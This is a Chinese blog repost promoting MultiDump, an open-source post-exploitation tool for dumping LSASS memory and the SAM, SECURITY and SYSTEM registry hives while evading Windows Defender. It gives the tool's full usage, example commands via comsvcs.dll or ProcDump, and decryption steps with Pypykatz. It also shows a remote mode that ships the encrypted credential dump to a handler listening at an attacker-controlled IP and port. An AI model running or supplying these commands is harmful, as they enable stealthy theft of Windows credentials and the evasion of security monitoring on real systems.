正文

MultiDump - 绕过Windows Defender 转储和提取 LSASS 内存

admin
admin V管理员 /0 评论 /4 阅读
0508
文章最后更新时间2025年05月08日,若文章内容或图片失效,请留言反馈!

MultiDump 是一个用 C 语言编写的后利用工具,用于秘密转储和提取 LSASS 内存,而不会触发 Defender 警报,使用 Python 编写的处理程序

MultiDump 通过ProcDump.exe 或 comsvc.dll支持 LSASS 转储,它提供两种模式:本地模式(在本地加密和存储转储文件)和远程模式(将转储发送到处理程序进行解密和分析)。

与所有 LSASS 相关工具一样,需要管理员/SeDebugPrivilege 权限。
    __  __       _ _   _ _____|  /|_   _|||_(_)  __  _   _ _ __ ___  _ __||/|||||| __||||||||'_ ` _ | '_ |||||_||||_|||__|||_||||||||_) ||_||_|__,_|_|__|_|_____/ __,_|_||_||_| .__/|_|Usage:  MultiDump.exe [-<ProcDumpPath>] [-<LocalDumpPath>|-<RemoteHandlerAddr>] [--procdump] [-v]-p              Path to save procdump.exe, use full path. Defaultto temp directory-l              Path to save encrypted dump file, use full path. Defaulttocurrent directory-r              Set ip:port toconnectto a remote handler--procdump      Writes procdump to disk and use it to dump LSASS--nodump        Disable LSASS dumping--reg           Dump SAM, SECURITY and SYSTEM hives--delay         Increase interval between connections to for slower network speeds-v              Enable verbose modeMultiDump defaults inlocal mode using comsvcs.dll and saves the encrypted dump in the current directory.Examples:        MultiDump.exe -l C:UsersPubliclsass.dmp -v        MultiDump.exe --procdump -p C:Toolsprocdump.exe -r 192.168.1.100:5000

该处理程序依赖于 Pypykatz 解析 LSASS 转储,并 进行打包解析注册表保存。它们应该已安装在您的环境中。如果您看到错误“所有检测方法均失败”,则可能是 Pypykatz 版本已过期。

默认情况下,MultiDump 使用 Comsvc.dll 方法并将加密转储保存在当前目录中。

MultiDump.exe...[i] Local Mode Selected. Writing Encrypted Dump File to Disk...[i] C:UsersMalTestDesktopdciqjp.dat Written to Disk.[i] Key: 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e
./ProcDumpHandler.py -f dciqjp.dat -k91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e

如果使用–procdump  ,ProcDump.exe 将写入磁盘以转储 LSASS。在远程模式下,MultiDump 连接到处理程序的监听器。

./ProcDumpHandler.py -r 9001[i] Listening on port 9001for encrypted key...MultiDump.exe -r 10.0.0.1:9001

密钥使用处理程序的 IP 和端口进行加密。当 MultiDump 通过代理连接时,处理程序应使用–override-ip选项在远程模式下手动指定密钥生成所需的 IP 地址,并通过将解密 IP 与 MultiDump -r 中设置的预期 IP 进行匹配,确保解密正确进行 。

使用 –reg选项可以转储SAM、SECURITY 和 SYSTEM配置单元,解密过程与 LSASS 转储相同。这更像是一个便利功能,可以更轻松地收集漏洞利用后的信息。

https://github.com/Xre0uS/MultiDump


推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
宙飒天下网-ZhouSa.com